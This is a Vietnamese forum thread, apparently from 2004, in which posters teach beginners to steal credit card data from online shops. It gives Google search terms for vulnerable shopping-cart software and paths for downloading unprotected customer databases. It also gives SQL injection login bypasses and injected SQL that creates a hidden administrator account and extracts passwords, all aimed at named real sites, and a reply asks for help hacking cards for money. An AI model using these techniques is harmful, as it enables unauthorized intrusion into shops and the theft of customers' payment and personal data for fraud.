Lead

Jul 4 04 9:23 PM

Tags : :

Thường các hacker hack cc từ những lỗi nghiêm trọng của các site bán hàng trên toàn thế giới (c̣n vô số những site chưa fix )...các lỗi thường gặp là :
acart2_0
SalesCart Database Storage Insecurity
Trong file shopper.cgi
Cart32 Sites
VP-ASP
............
Dưới đây là bài viết chi tiết cách hack các lỗi đó, tất nhiên cũng ko phải tui t́m ra được các lỗi này...v́ các lỗi này đựoc t́m ra rất lâu rùi...được sang qua sang lại....đến nỗi tác giả của nó là ai cũng ko c̣n nhớ nỗi nữa...!!!
---------------------------------------------------------------------------------------------
Lỗi acart2_0" :
Đầu tiên các bạn vào http://google.com ( các bạn có thể vào các site t́m kiếm khác như http://av.com .... ) search keyword "acart2_0" ,bạn thấy rất nhiều file mắc lỗi này,do kinh nghiệm ḿnh khuyên các bạn nên chọn những site có dạng http://url/acart2_0/ ví dụ site http://www.coolrob.com/cart/acart2_0 ,gơ thêm" /acart2_0.mdb "vào đằng sau url, enter xong bạn thấy màn h́nh dơnload là thành công rùi đó...bạn có thể down toàn bộ file database *.mdb của shop bán hàng đó...
---------------------------------------------------------------------------------------------
Lỗi VP-ASP:
đầu tiên vào http://google.com search từ khoá "shopdisplaycategories" click vào site bạn sẽ thấy là http://www.sitename.com/shopping/sh...ycategories.asp
Việc tiếp theo là chuyển url http://www.sitename.com/shopping/sh...ycategories.asp thành url http://www.sitename.com/shopping/shopdbtest.asp nghĩa là thay shopdisplaycategories.asp bằng shopdbtest.asp rồi enter...nếu ra tiếp thêm một trang nữa...<---ko phảt là no page .th́ bạn có cơ hội down *mdb của site này đó...
sau khi ra trang mới xong,áp dụng công thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ]
-[vp-asp site] là : www.sitename.com
-[ vp-asp dir] là :shopping
-[ xDatabase + .mdb ] sẽ là shopping.mdb
nếu có màn h́nh save th́ bạn thành công rùi đó...
-----------------------------------------------------------------------------------------------
Lỗi shopper.cgi:
vào http://google.com search từ khoá shopper.cgi hoặc shopper.execopy những url có dạng sitename.com/cgi-bin/shopper.cgi?
sau đó paste vào browse và thêm ḍng search=action&keywords=ccpower &template=shopper.conf hoặc hoặc thêm ḍng search=action&keywords=ccpower &template=order1.log vào đằng sau,nếu may mắn bạn sẽ t́m thấy cc
-----------------------------------------------------------------------------------------------
Lỗi Cart32.exe:
vào google.com ,search từ khóa "Cart32.exe v3"đầu tiên vào http://www.sitename.com/cgi-bin/cart32.exe/sitename
Lấy Credit Cards : http://www.sitename.com/cgi-bin/car...name-ORDERS.txt
hoặc : http://www.sitename.com/cgi-bin/car...name-OUTPUT.txt
------------------------------------------------------------------------------------------------
Hack CC thông qua lỗi SalesCart Database Storage Insecurity:
Tổng quát: Lỗi này thực chất là dữ liệu của các chương tŕnh mua bán không được bảo mật, mă hóa hay cất giữ cẩn thận nên bạn hoàn toàn có thể lấy chúng một cách dễ dàng
Lưu ư: đôi khi với thực tế, 1 số link có thể khác đi, không phải lúc nào cũng hoàn toàn đúng, dữ liệu có khi bao gồm cả CRD (Credit Card) nên mọi việc phải qua proxy (nếu không có proxy th́ có thể ra dịch vụ...)
Khai thác: Hăy sử dụng 1 trong những link sau:
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
Ví dụ: site84vn.com có thể download cc từ đây: www.84vn.com/database/metacart.mdb
Có nghĩa là database không hề có 1 chút bảo mật nào cả. Download vô tư ! Trong database có thể bao gồm: name, surname, address, e-mail, phone number, credit card number, company name.....
Bạn có thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc không phải lúc nào cũng suôn sẻ cả, bạn hăy tưởng tượng mỗi server có một cấu trúc riêng, ví dụ như đường dẫn không phải lúc nào cũng là fpdb/... hay như những link trên, hăy tận dụng lỗi và thử từng cái một , nhiều khi là www.victim.com/muaban/fpdb/shop.mdb v́ vậy nếu bạn xài cách này hăy linh hoạt trong link tuỳ vào từng site! <----copy by h4a......
------------------------------------------------------------------------------------------------
lên google t́m từ khóa
"inurl:commerce.cgi"
Rồi okie số địa chỉ online đang chờ đón
vd:
ta có site
<http://www.warresisters.org/store/commerce.cgi>?
xóa cái commerce.cgi? đi thay bằng Admin_files/commerce_user_lib.pl
ta sẽ được
## This file contains the user specific variables
## necessary for Commerce.cgi


$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = "http://www.warresisters.org/store";
$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi";
$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;

xóa cái commerce_user_lib.pl đi thay bằng onlinebookstore.log (t́m ở $sc_order_log_name ) và ....
Việc tiếp theo là thuộc về bạn
------------------------------------------------------------------------------------------------
Vào google gơ từ khoá tek9.aspta được link có dạng tương tự như thế này
https://ionicpurifier.com/tek9.asp?...ers&mode=search
bắy đầu từ /tek9.asp/ gơ thêm /intranethttps://ionicpurifier.com/intranet/tek9.asp...ers&mode=search
Sau đó đăng nhập với user và pass 'or''='nếu may mắn th́ sẽ vào được , và ăn cc tha hồ
c̣n rất nhiều site bị lỗi này
------------------------------------------------------------------------------------------------
Search keyword in google.com.vn : " Shoping /admin "

http://shopping.richardhealey.com/admin_login.asp

http://families-online.org/admin_login.asp

user/pass : ' or 1=1--

Code của site cho phép exploit lên SQL Server .
------------------------------------------------------------------------------------------------
Trên đây là các cách hack cc dành cho newbie...giúp bạn down *.mdb từ bất cứ site bị mắc các lỗi trên....c̣n nhiều cách hack cc nữa...rất tốn thời giờ...có thể ngồi cả ngày ...mà vẫn ko kiếp chát được ǵ...hack cc này như là ngồi câu cá vậy...quan trọng là phải biết kiên nhẫn....
sau khi save vào máy ( đă setup sẵn microsoft-access 2000 - nằm trong bộ microsoft-office) <-----chương tŕnh giúp đọc file *.mdb
double click chuột vào file db trên các bạn sẽ thấy rất nhiều tab, thông thường những thông tin trong tab oder là những thông tin mà chúng ta cần t́m kiếm ( cc ), click lên tab để view,sau khi click tab oder các bạn sẽ thấy rất nhiều thông tin, nhiều khi có cả cc ! Chúc bạn thành công..

Quote    Reply   

#1 [url]

Jul 4 04 9:34 PM

bài này tớ sưu tập được của"Silvery Hat Hacker"



Ăn cắp Thẻ Tín Dụng qua lỗi SQL

Trong bài viết này , Silvery Hat Hacker sẽ giới thiệu đến với bạn 10 cách đánh cắp Thẻ Tín Dụng qua lỗi Sql Injection lẫn các lỗi thông qua Google và các Bug khác... Có thể bạn đă bắt gặp ở đâu đó cách thức hack tương tự như trong những bài viết này , nhưng v́ nhiều người bạn qua Yahoo Hop thu đă hỏi hay nói với Silvery Hat Hacker rằng họ chưa hiểu hay chưa biết rơ phải làm sao. V́ vậy Silvery Hat Hacker đành viết lại 1 lần nữa chuỗi bài viết về Hack cc này. Cũ có mới cũng có nhưng lỗi vẫn là lỗi và Silvery Hat Hacker đă chọn ra và sưu tầm từ nhiều nguồn những phương pháp c̣n có thể thành công để tŕnh bày ở đây...



1-Thông qua lỗi SQL của Alabanza AlaCart :

A\Mô tả :

AlaCart là 1 trong những ứng dụng web dùng để trao đổi và mua bán hàng qua mạng của Alabanza , 1 công ty chuyên về Dịch vụ Máy Chủ tự Động Hóa ( Web hosting automation ) . Trong phiên bản đă kiểm nghiệm ( v1.27 ) , Silvery Hat Hacker và anh bạn đă viết ra bài này ( phiên bản English ) đă phát hiện ra lỗi chèn đọan mă SQL vào quá tŕnh đăng nhập của AlaCart trong vai tṛ Administrator để quản lư cơ sở dữ liệu ṭan bộ thành phần của Web có vấn đề. Nó cho phép Tin tặc có thể đăng nhập mả không cần biết Username và Password. ( Lỗi Sql : Nếu bạn không biết v́ sao hăy tham khảo ở đây hay các bài khác của phần Kiến thức Cơ Bản để học hỏi thêm )

B\Tiến Hành :

Bạn cần 1 website cài đặt AlaCart

Công nghệ quản lư Mua-Bán của AlaCart nằm trong thư mục /s-car

Để bắt đầu truy vào trang đăng nhập của Admin , ta có thư mục /admin

=> ta sẽ có www.tên website.tên miền/s-car/admin => bạn vào được trang đăng nhập. Nó sẽ xuất hiện thông báo đ̣i tên truy nhập và mật khẩu

-V́ bạn đă biết AlaCart bị SQL nên ta sẽ dùng các Username và Password dùng để boipass tương tự như sao : 'or''='

-Vào được cơ sở quản lư rồi. Bạn vẫn c̣n khó khăn trước mắt :

+Nh́n vào không thấy Thẻ Tín Dụng

+Ṭan chữ và chữ

Bạn đừng thất vọng , v́ khi vừa vào là bạn đă gặp ngay phần Giup do - Trợ Giúp được mặc định hiển thị của AlaCart nên click vào các link ở giữa trước mắt chỉ là t́m hiểu cách họat động của chúng chứ không phải điều khiển chúng. Bạn nh́n lên các ḍng ngang , t́m Order Lua chon hay Order. Trong trang kế , bạn t́m ḍng :

Please enter the email address to which orders will be sent: - Xin hảy vui ḷng nhập vào địa chỉ email mà các thông tin mua bán sẽ được gửi đến:

-Tới đây không thể chỉ hơn được nữa , bạn hăy tự làm lấy , mặc dù phải chờ đợi..Nhưng chúc may mắn. Silvery Hat Hacker đă lấy được rất nhiều Thẻ Tín Dụng bằng cách này rồi.

Trang ví dụ ( bạn kiếm thêm qua Google bằng từ khóa s-cart/admin/ ) :

http://avantiparts.net/s-cart/admin/

http://64.177.121.164/s-cart/admin/

Đừng phá quá , tội người khác nha , các Newbies. Thanks



2-Thông qua lỗi SQL của VP-ASP:

A\Mô tả :

Cái này đă quá quen thuộc với dân Ăn cắp Thẻ Tín Dụng rồi. Silvery Hat Hacker chỉ nói sơ qua thôi. Đây là 1 công cụ mạnh mẽ giúp cho admin của các website Bán hàng quản lư cơ sở dữ liệu của ḿnh dễ dàng hơn. Tiện lợi , nhưng VP-ASP có cả khối lỗi cho Hackers khai thác...Silvery Hat Hacker sẽ từ từ tŕnh bày chúng lên cho các bạn THAM KHẢO - chỉ mong bạn tham khảo cho biết thôi...

B\Tiến Hành :

-SQL Injection lại tiếp tục làm khổ các website...Bạn tiếp tục có cơ hội để boipass - đăng nhập trái phép vào vai tṛ admin qua 'or''=' để "quản lư" cơ sơ dữ liệu hộ admin.

Đường dẫn để đăng nhập

www.tên website.tên miền/vpasp/shopadmin.asp

-1 số admin "quên" đổi Username và password mặc định vpasp/vpasp hay admin/admin . Bạn có thêm 1 cơ hội nhỏ nữa .



3-Thông qua lỗi SQL của Storefront:

A\Mô tả :

Storefront cũng như VP-ASP , nó là 1 hệ thống bao gồm tất cả những ǵ cần thiết cho việc quản lư 1 website thương mại trên Internet….Và , cũng như AlaCart và VP-ASP , Storefront bị dính lỗi SQL ở trang Login mà qua đó cho phép hackers lấy quyền đăng nhập vào phần quản lư của Admin mà không cần sự cho phép.

B\Tiến Hành :

-Bạn vào http://www.google.com/intl/xx-hacker/ , t́m với từ khóa Storefront allinurl:/login.asp . Sauk hi t́m được những trang Login , bạn dùng Username và Password ' or 'a'='a để boipass vào.

-Nếu như bạn đă biết trước địa chỉ email của ai đó , bạn cũng có thể sử dụng nó ở đây theo dạng sau :

Username : địa chỉ email đă biết

Password : ' or 'a'='a

=> Bạn vào được phần quản lư của user sở hữu địa chỉ email trên. Việc lấy thẻ tín dụng ở đây không c̣n là việc khó khăn nữa.



4-Thông qua lỗi SQL của VP-ASP:

A\Mô tả :

1 phiên bản khác của VP-ASP , lỗi SQL đă được phát hiện ra trong 2 trang shopTim kiem.asp và shopdisplayproducts.asp qua đó cho phép những tin tặc tạo 1 tài khỏan Người Quản Trị mới , đổi mật khẩu của Admin trước đó mà không cần biết password hay chỉ đơn giản là đăng nhập trái phép để đọc thong tin bán hang của website…Bao gồm cà thẻ tín dụng

B\Tiến Hành :

Như thường lệ bạn t́m trong Google…allinurl:shopTim kiem.asp hay allinurl:shopdisplayproducts.asp .

Vấn đề ở đây là bạn không thể nào boipass vào tài khỏan admin được như 3 cách trên mà phải thực hiện 1 số mă lệnh SQL trước ( Lưu ư rằng những đọan mă sau bạn chèn vào ngay sau đường Link shopTim kiem.asp? ) :

A\THÔNG QUA TRANG SHOPTim kiem.ASP

I - Chèn 1 tài khỏan vào Database :

-Câu lệnh :

Keyword=&category=5); insert into tbluser (fldusername) values ('tên tài khỏan')--&SubCategory=&hide=&action.x=46&action.y=6

-Ví dụ :

http://www.birnsandsawyer.com/webcart/shop...d=&category=5); insert into tbluser (fldusername) values ('silveryhat')--&SubCategory=&hide=&action.x=46&action.y=6



II - Thiết lập mật khẩu cho tài khỏan đă có :

-Câu lệnh :

Keyword=&category=5); update tbluser set fldpassword='mật khẩu' where fldusername='tên tài khỏan'--&SubCategory=All&action.x=33&action.y=6

-Ví dụ :

http://www.birnsandsawyer.com/webcart/shop...d=&category=5); update tbluser set fldpassword='87fzvwek' where fldusername='silveryhat'--&SubCategory=All&action.x=33&action.y=6



III – Thiết lập quyền truy cập của tài khỏan ( ở đây cho là quyền của người quản trị cho nó oai ) :

-Câu lệnh :

Keyword=&category=3); update tbluser set fldaccess='1 - đây là quyền của admin' where fldusername='tên tài khỏan'--&SubCategory=All&action.x=33&action.y=6

-Ví dụ :

http://www.birnsandsawyer.com/webcart/shop...d=&category=3); update tbluser set fldaccess='1' where fldusername='silveryhat'--&SubCategory=All&action.x=33&action.y=6



Đó là 3 hàng lệnh mà bạn nên biết khi bắt đầu hack vào VP-ASP qua trang shopTim kiem.asp. Tất nhiên nó c̣n vài câu lệnh nữa, nhưng Silvery Hat Hacker không muốn thực hành ở đây , bạn hăy xem sơ qua câu lệnh :

IV\Đổi password 1 tài khỏan :

Keyword=&category=5); update tbluser set fldpassword='mật khẩu mới' where fldusername='tên tài khỏan'--&SubCategory=All&action.x=33&action.y=6

V\Xem mật khẩu của 1 tài khỏan :

cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='tên tài khỏan'%20and%20fldpasswo rd%20like%20'a%25'—



B\THÔNG QUA TRANG SHOPDISPLAYPRODUCTS.ASP

-Nói thật ra th́ Silvery Hat Hacker cũng chưa nắm rơ về phương pháp này cho lắm v́ chưa có cơ hội thực hành với trang shopdisplayproducts.asp. Tuy nhưng Silvery Hat Hacker tin chắc nó có liên quan đến việc Xem mật khẩu của tài khoản ở trên.

http://tên website/vpasp/shopdisplayproducts.asp?cat=qwerty' union%20select fldauto,fldpassword%20from%20tbluser%20where fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

Bạn thay lần lượt ḍng cuối cùng ( màu xanh lá cây ) bằng :

%20'a%25'--

%20'b%25'--

%20'c%25'—



Lỗi này được thông báo cho VP-ASP ngày 28/11/2003



5\Lỗi đường dẫn của ProductCart :

A\Mô tả :

-ProductCart một sản phẩm đầu tay của hăng Early Impact, nó giúp cho người quản trị website bán hàng trực tuyến dễ dàng điều khiển thiết lập hay tinh chỉnh tính năng và tiện ích trong Website của ḿnh 1 cách trực quan và dễ hiểu qua giao diện quản lư rất thân thiện. Tuy không thể so sánh với VP-ASP , 1 cao thủ trong số các phần mềm bán hàng trực tuyến với hàng trăm website sử dụng và hàng chục Bug lỗi trong đó. V́ thế , ở đây, ProductCart chỉ là hạng lon con với 1 lỗi duy nhất, cực kỳ nguy hiểm. Qua lỗi này, Silvery Hat Hacker có thể trực tiếp đưa về máy ḿnh mười mấy Megaboites Credit Cards và thông tin về khác mua hàng trong Website đó. Lỗi đường dẫn diễn ra, nghĩa là chúng ta không cần biết Website đó như thế nào, trông ra sao, bên trong có thư mục ǵ, h́nh ảnh thế nào....nhưng vẫn có thể tải 1 số thẻ tín dụng về máy ḿnh trơn tru, ít bị phát hiện v́ Admin có thể không xác định được đă có người ghé thăm nhà ḿnh và bê cái két sắt ( Credit Cards ) về làm của riêng đâu...



B\Tiến hành :

-Hầu hết chúng ta đều dùng công cụ Google để t́m kiếm 1 thông tin hay tài liệu website nào đó nhằm cho nhiều mục đích vui chơi và học tập. Thế nhưng , bên cạnh đó Google cũng tài sản vô giá của Hackers khi nó trở thành mục tiêu trung gian để khai thác, xâm nhập bất hợp pháp vào khu vực của 1 Website nào đó mà người dùng b́nh thường không thể biết. Chỉ với 1 từ khóa đơn giản, thông tin quan trọng về Webmaster,người đó có thể bị lộ, chỉ với 1 từ khóa đơn giản, password của ai đó có thể bị mất, và, chỉ với 1 từ khóa đơn giản, bạn có thể download cả Database - tập tin quản lư dữ liệu chứa hàng chục Credit Card chùa về máy ḿnh mà không cần phải vào xem mặt Website đó. Tương tự như ở đây, ProductCart bị mắc lỗi ở việc quản lư đường dẫn đưa tới nơi lưu trữ Database cực kỳ nguy hiểm mà cho phép chúng ta làm công việc Silvery Hat Hacker nói ở trên.

-Trong quá tŕnh thực hành theo bài viết này, Silvery Hat Hacker sẽ không chịu bất kỳ trách nhiệm nào do bạn gây ra làm ảnh hưởng đến nhân dân trong cộng đồng Internet này, chính bạn sẽ là người gánh hết mọi hậu quả khi có vấn đề liên quan đến pháp luật. Nếu bạn không chắc về những ǵ ḿnh làm, Silvery Hat Hacker đề nghị bạn đóng của sổ tŕnh duyệt hiện tại, xé bỏ tờ giấy nếu bạn có bản in của tài liệu này trước khi mọi chuyện do bạn làm trở nên tồi tệ hơn.

-Ah, bạn không làm theo Silvery Hat Hacker nói ở trên àh ? Sau khi đọc hết ḍng chữ bạn đang đọc này nghĩa là bạn đă đồng ư với luật lệ Silvery Hat Hacker nói ở trên và chấp nhận liều mạng. Ta hăy bắt đầu vấn đề chính :

+Bạn vào http://www.google.com/intl/xx-hacker/ , t́m với từ khóa sau Allinurl:/productcart/ . Hàng lọat link web sẽ xuất hiện trong cửa sổ kết quả của Google. Bạn chọn đại 1 link nào đó ở trang thứ 3 hay 4 trở đi. Silvery Hat Hacker chọn http://store.klas-fm.firstmediaworks.com/ để làm dẫn chứng minh họa.

+Có được 1 trang web dùng ProductCart , vấn đề kế tiếp bạn làm thêm vào tên của sản phẩm này sau link web :

http://store.klas-fm.firstmediaworks.com/ProductCart

+Chẳng có ǵ xảy ra ngọai trừ vào website nếu bạn click link đó phải không ? Nhưng nếu, dừng lại suy nghĩ giây lát, bạn biết thẻ tín dụng thường được chứa trong Database để dễ quản lư phải không ? Vậy nó thường chứa ở đâu trong website bây giờ ?... Silvery Hat Hacker thử lấy đại biệt danh của tập tin chứa Credit Card này thêm vào link :

http://store.klas-fm.firstmediaworks.com/P...ctCart/Database

+Tự nhiên cái thấy vui nên viết ḍng này.

+Nếu bạn chưa thấy được Database th́ để Silvery Hat Hacker giúp vậy, bạn thêm EIPC.mdb vào nơi tận cùng link sau khi đă qua các giai đọan ở trên, ta có ví dụ :

http://store.klas-fm.firstmediaworks.com/P...tabase/EIPC.mdb

+Thử click Refresh hoặc Go trên tŕnh duyệt. Chẳng thấy ǵ xảy ra cả, tự nhiên bắt tải tập tin ǵ đó gần 2.24 Mb về máy với đuôi mdb. Mở ra hàng đống cột và bàng như Credit Cards, Customers, Admin, Orders.....



C\Tóm gọn:

-Đối tượng : ProductCart của hăng Early Impact.

-Phiên bản : Không rơ.

-Đối tượng có liên quan : tŕnh t́m kiếm Google.

-Mức độ lỗi : Nguy hiểm cho người mua hàng ở Website đó.

+Khả năng lấy được Credit Card : 3.5/5

-Công thức - Cách khai thác gồm có :

http://www.tên website dùng ProductCart.tên miền/ProductCart/Database/EIPC.mdb

-Được ǵ ?

Tập tin chứa Credit Cards của Website đó.

-Vấn đề lớn nhưng cũng hơi nhỏ : có thể Database bị mă hóa !

-Hướng giải quyết : T́m tŕnh giải mă bằng Google



Bài viết đến đây chấm dứt. Tùy vào khả năng mỗi bạn mà có thể hack được hay không. Nhưng vấn đề chính ở đây là cách giải mă nếu database bị mă hóa mà thôi. Silvery Hat Hacker đă thử viết 1 tŕnh nhưng cho ra kết quả Credit Card 1 nơi , tên 1 nơi, địa chỉ lại ở nơi khác nên thôi, bạn nên vào Google và t́m tŕnh giải mă. Có lẽ qua câu lệnh như : Mdp Decoder chẳng hạn.



Bài phụ :

I\Lỗi đường dẫn Fpdb của 1 tŕnh quản lư mua hàng trực tuyến :

+T́m trong Google với từ khóa sau :

allinurl: /fpdb/

+Vài chục trang sẽ xuất hiện, Silvery Hat Hacker đưa ví dụ sau :

http://home.cfl.rr.com/pcscap/Fpdb/

+Trong cửa sổ mới, bạn chọn tùy lọai mdb mà tải về.

+Khả năng lấy được Credit Card : 3/5



I\Lỗi đường dẫn shop.mdb của 1 tŕnh quản lư mua hàng trực tuyến :

+Lại là Google thôi bạn :

allinurl: shop.mdb

+Vài chục trang sẽ lại xuất hiện, Silvery Hat Hacker cũng đưa ví dụ chứng minh :

http://www.thomas.edu/larochelle/cs116/200...ckey%20Shop.mdb

http://www.staff.sbc.edu/kcook/classfiles/...0Pet%20Shop.mdb

+Khả năng lấy được Credit Card : 1.75/5

user posted image

Quote    Reply   

#3 [url]

Dec 20 04 11:03 PM

neu nhu ko lam thi nhung kinh ngyiem nay da tung lam dien dao cua ca "the gioi" nhung 1 so it website chua "fix" het dau nen van con su dung duoc day ! co the co phien ban moi hon roi !
cam on cac thanh vien da co gang post nhung bai "tam co" nhu vay !

Quote    Reply   

#5 [url]

Sep 8 10 10:16 AM

rất muốn, nhưng thử hoài chả đc con cc nào !!
Bro nào cho cái yahoo để ḿnh hỏi thêm về cc kô - đang muốn hack cc kiếm ít ăn học á mà :))

Quote    Reply   
Add Reply

Quick Reply

bbcode help